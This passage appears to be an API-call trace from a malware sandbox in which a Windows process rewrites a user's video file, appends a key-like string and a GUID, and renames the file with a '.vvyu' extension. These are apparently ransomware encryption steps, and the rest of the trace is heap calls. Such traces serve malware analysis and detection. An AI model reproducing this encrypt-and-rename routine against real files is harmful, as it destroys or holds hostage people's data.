[0196.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.110] GetCurrentThreadId () returned 0x5d8 [0196.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6590 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65f0 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6608 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65a8 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6578 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0196.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea140 | out: hHeap=0x2c0000) returned 1 [0196.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0196.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.122] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1329d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1329d, lpOverlapped=0x0) returned 1 [0196.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.123] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x132a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.123] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0196.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0196.125] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.125] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.125] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.125] CloseHandle (hObject=0x584) returned 1 [0196.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0196.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0196.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0196.131] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\RpFnCBUaRW4M2CKB6Y8.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\rpfncbuarw4m2ckb6y8.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\RpFnCBUaRW4M2CKB6Y8.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\rpfncbuarw4m2ckb6y8.avi.vvyu")) returned 1 [0196.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.133] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0196.136] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf47d0770, ftCreationTime.dwHighDateTime=0x1d8a5c3, ftLastAccessTime.dwLowDateTime=0xee9fb900, ftLastAccessTime.dwHighDateTime=0x1d8a6eb, ftLastWriteTime.dwLowDateTime=0xee9fb900, ftLastWriteTime.dwHighDateTime=0x1d8a6eb, nFileSizeHigh=0x0, nFileSizeLow=0x132a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RpFnCBUaRW4M2CKB6Y8.avi", cAlternateFileName="RPFNCB~1.AVI")) returned 0 [0196.136] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0196.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.137] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0196.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0196.137] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0196.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.153] 